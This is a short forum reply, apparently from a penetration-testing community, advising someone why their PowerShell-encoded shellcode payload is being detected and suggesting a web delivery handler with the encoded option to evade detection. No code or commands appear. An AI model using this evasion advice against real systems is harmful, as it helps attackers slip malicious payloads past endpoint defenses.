I think most likely it might be you have shellcode inside a Powershell encoded command that is easily seen.  Not running in memory when it is right there in the code and being executed.  The memory part is after it is running then it can download and run directly from memory.  The beginning you are still firing off Powershell.exe from disk with parameters.  The web delivery handler and built in command it gives you may do it for you without all the above though that I think of it.  Choose encoded to be sure.  If not, some of the above may help.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...